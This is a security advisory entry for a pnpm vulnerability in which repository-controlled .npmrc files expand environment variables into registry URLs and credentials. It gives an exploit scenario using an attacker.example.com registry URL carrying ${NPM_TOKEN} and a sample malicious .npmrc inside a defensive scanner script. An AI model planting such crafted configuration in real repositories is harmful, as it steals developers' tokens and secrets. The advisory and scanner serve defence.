Severity by source
CVSS vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
AV:N because the malicious repository is delivered over the network; PR:N because the attacker only needs to control the repository, not the victim's system; UI:R because the victim must clone the repository and run pnpm; C:H for exfiltration of high-value secrets; no integrity or availability impact.
Primary rating from Vendor (GitHub_M).
CVSS Vector (Vendor: GitHub_M)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Description (CVE.org)
pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3.
Analysis (AI)
Affected pnpm versions expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml files into registry request URLs and credentials. When a developer clones a crafted repository and runs pnpm install in it, the package manager resolves dependency requests against attacker-controlled registry endpoints, transmitting whatever environment variables (tokens, API keys, credentials) the victim has set in their shell. …
Vulnerability Assessment (AI)
| Section | Assessment |
|---|---|
| Exploitation | The victim must clone a repository controlled or influenced by the attacker and then invoke pnpm dependency resolution (e.g., pnpm install, pnpm fetch, or equivalent) within that repository directory. … |
| Risk Assessment | The CVSS 3.1 score of 6.5 with vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N accurately reflects the threat profile: network-delivered, low complexity, no attacker privileges needed, but requiring user interaction (UI:R). … |
| Exploit Scenario | An attacker publishes or contributes to a repository containing a crafted .npmrc or pnpm-workspace.yaml that sets the registry URL to https://attacker.example.com/${NPM_TOKEN}/ or similar. When a victim developer clones the repository and runs pnpm install (a routine step in onboarding, CI pipelines, or reviewing pull requests), pnpm expands the environment variable, sends the token value to the attacker's server in the outbound HTTP request path, and the attacker reads it from the server logs. … |
| Remediation | Upgrade pnpm to version 10.34.2 or later on the 10.x release line, or to 11.5.3 or later on the 11.x release line; these are the vendor-confirmed fixed versions per the GitHub Security Advisory GHSA-3qhv-2rgh-x77r at https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r. … |
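As an added defender-side check (example code, not pnpm's own code and not part of this advisory): a pre-install scan that flags ${ENV_VAR} placeholders in a repository's .npmrc registry and credential settings, plus a version test against the fixed releases named above. The sample .npmrc and its hostnames are constructed; the set of credential keys checked is an assumption.

```javascript
// Added example, not pnpm's or the advisory's code: flag ${ENV_VAR} placeholders
// that a repository-controlled .npmrc would expand into registry URLs or
// credentials, and test a pnpm version against the fixed releases named above.
const PLACEHOLDER = /\$\{([A-Za-z_][A-Za-z0-9_]*)\}/g;

// Where a placeholder in this key's value would end up (null = not registry-related).
function classifyKey(key) {
  if (key === 'registry' || key.endsWith(':registry')) return 'registry-url';
  if (/:(_authToken|_auth|_password|username|tokenHelper)$/.test(key)) return 'credential';
  return null;
}

// Parse .npmrc text (key=value lines, '#' or ';' comments) and report each
// ${VAR} placeholder found in a registry destination or credential setting.
function findEnvPlaceholders(npmrcText) {
  const findings = [];
  for (const raw of npmrcText.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    const key = line.slice(0, eq).trim();
    const kind = classifyKey(key);
    if (!kind) continue;
    for (const m of line.slice(eq + 1).matchAll(PLACEHOLDER)) {
      findings.push({ key, variable: m[1], kind });
    }
  }
  return findings;
}

// True when a plain x.y.z pnpm version predates the fixed release on its line
// (10.34.2 for 10.x, 11.5.3 for 11.x); other major lines are not covered here.
function isAffectedVersion(version) {
  const [major, minor, patch] = version.split('.').map(Number);
  const fixed = { 10: [34, 2], 11: [5, 3] }[major];
  if (!fixed) return false;
  return minor < fixed[0] || (minor === fixed[0] && patch < fixed[1]);
}

// Constructed sample .npmrc of the shape the advisory describes (hostnames are made up).
const SAMPLE_NPMRC = [
  '# constructed sample, not taken from any real repository',
  'registry=https://registry.example.test/${NPM_TOKEN}/',
  '//registry.example.test/:_authToken=${GITHUB_TOKEN}',
  '@acme:registry=https://npm.acme.example/',
  'strict-ssl=true',
].join('\n');
console.log(findEnvPlaceholders(SAMPLE_NPMRC), isAffectedVersion('10.34.1'));
```

Running the scan before pnpm install in CI, and failing the job on any finding, blocks the expansion step this advisory describes regardless of which pnpm version is installed.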
Weakness: CWE-200 – Information Exposure
Technique: Information Disclosure
Identifiers: EUVD-2026-39498, GHSA-3qhv-2rgh-x77r